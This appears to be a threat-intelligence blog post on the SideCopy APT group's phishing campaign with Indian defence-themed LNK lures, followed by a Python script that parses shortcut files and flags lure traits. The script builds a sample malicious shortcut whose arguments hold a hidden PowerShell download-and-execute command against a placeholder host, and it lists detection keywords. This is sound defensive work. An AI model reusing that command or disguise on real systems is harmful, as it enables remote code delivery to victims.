Analysis of SideCopy Group’s Recent Attacks Using Indian Ministry of Defense Documents as Lures

7 min read · Mar 21, 2023

Background

In September 2020, Quick Heal disclosed an espionage operation targeting the Indian defence forces and armed-forces personnel and named it Operation SideCopy. The operation began in early 2019; because its operators largely reused the TTPs of the Sidewinder APT group, it was named Operation SideCopy.

In July 2021, Cisco Talos researchers began tracking the actors behind Operation SideCopy as an independent group and named it the SideCopy APT group. Their report disclosed that the group used a range of tooling, including CetaRAT, ReverseRAT, MargulasRAT, AllakoreRAT, and several C# plugins [1].

Recently, during our continuous tracking of the SideCopy group, we discovered some interesting samples.

Overview

In this campaign, SideCopy's infection chain is largely consistent with its earlier activity: a malicious LNK file is the entry point, followed by a multi-stage chain in which files are nested several layers deep before the final payload is delivered. Based on our analysis, the activity has the following characteristics:

  1. Spear-phishing emails, with an LNK file inside a compressed archive as the entry point;
  2. Subsequent payloads are loaded and executed in memory rather than being written to disk;
  3. The final payload is an improved…
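The entry point described above is a shortcut file inside an archive, and the first thing a responder wants from such a file is what it actually launches versus what it pretends to be. The script below is an added example for this page, not code from the original article and not a SideCopy sample: it parses the ShellLinkHeader and StringData sections of a Shell Link file as laid out in MS-SHLLINK (header, optional IDList and LinkInfo skipped by their size fields, then name, relative path, working directory, arguments and icon location in that fixed order), and runs simple triage heuristics over the result. The two LNK files it inspects are constructed in the script from made-up values (the `lure.invalid` host, the Acrobat icon path and the cmd/powershell chain are assumptions chosen to resemble a document-lure shortcut); the heuristics are the editor's, not the article's.

```python
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in on-disk (little-endian) byte order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the spawned console window out of sight
# StringData structures appear in this fixed order, each present only if its flag is set
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
SCRIPT_HOSTS = ("cmd", "powershell", "pwsh", "mshta", "wscript", "cscript", "rundll32", "regsvr32")
DOC_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "acrobat.exe", "acrord32.exe")
HOST_RE = re.compile(r"\b(" + "|".join(SCRIPT_HOSTS) + r")\b")
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-enc", "-encodedcommand",
                   "iex", "downloadstring", "downloadfile", "http://", "https://")


@dataclass
class LnkInfo:
    show_command: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def parse_lnk(data: bytes) -> LnkInfo:
    """Read the ShellLinkHeader and StringData of a .lnk file."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = LnkInfo(show_command=struct.unpack_from("<I", data, 60)[0])
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (u16) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (u32) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    for flag, attr in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        raw = data[off:off + (count * 2 if unicode else count)]
        off += len(raw)
        setattr(info, attr, raw.decode("utf-16-le" if unicode else "cp1252", "replace"))
    return info


def triage(info: LnkInfo) -> List[str]:
    """Flag traits of a lure shortcut that really launches a script host."""
    findings = []
    target = (info.relative_path or "").lower()
    args = info.arguments or ""
    if target.endswith(tuple(h + ".exe" for h in SCRIPT_HOSTS)):
        findings.append("target-is-script-host")
    if HOST_RE.search(args.lower()):           # e.g. cmd /c ... powershell ...
        findings.append("args-spawn-script-host")
    if any(k in args.lower() for k in SUSPICIOUS_ARGS):
        findings.append("args-hidden-or-download")
    if info.show_command == SW_SHOWMINNOACTIVE:
        findings.append("window-minimized")
    if " " * 20 in args:                       # padding that pushes the real command out of view
        findings.append("args-whitespace-padded")
    icon = (info.icon_location or "").lower()
    if icon.endswith(DOC_APPS) and not target.endswith(DOC_APPS):
        findings.append("icon-mimics-document-app")
    return findings


def build_lnk(show_command: int = 1, **strings: str) -> bytes:
    """Assemble a minimal Unicode .lnk (header + StringData) for the constructed samples."""
    flags, body = IS_UNICODE, b""
    for flag, attr in STRING_FIELDS:
        value = strings.get(attr)
        if value is not None:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes ExtraData


# Constructed samples: made-up paths and host, not real SideCopy artefacts
MALICIOUS_LNK = build_lnk(
    show_command=SW_SHOWMINNOACTIVE,
    relative_path="..\\..\\..\\..\\Windows\\System32\\cmd.exe",
    working_dir="C:\\Windows\\System32",
    arguments='/c start /min "" powershell -w hidden -nop -c '
              '"IEX (New-Object Net.WebClient).DownloadString(\'http://lure.invalid/s2\')"',
    icon_location="C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe",
)
BENIGN_LNK = build_lnk(
    relative_path="..\\..\\..\\..\\Windows\\System32\\notepad.exe",
    working_dir="C:\\Users\\Public",
    arguments="notes.txt",
)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        info = parse_lnk(blob)
        print(label, info.relative_path, info.arguments, triage(info))
```

Point `parse_lnk` at the bytes of any shortcut extracted from a phishing archive to get the same fields; real samples usually also carry an IDList and LinkInfo, which the parser skips by their length fields before reading the strings, and the ExtraData blocks after the strings (which can hold the tracker and environment data useful for attribution) are left for a fuller tool.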


Written by CybersecInfo

CyberSecurity Beginner | Penetration Tester | Security Researcher | CISSP | "motorcyclist"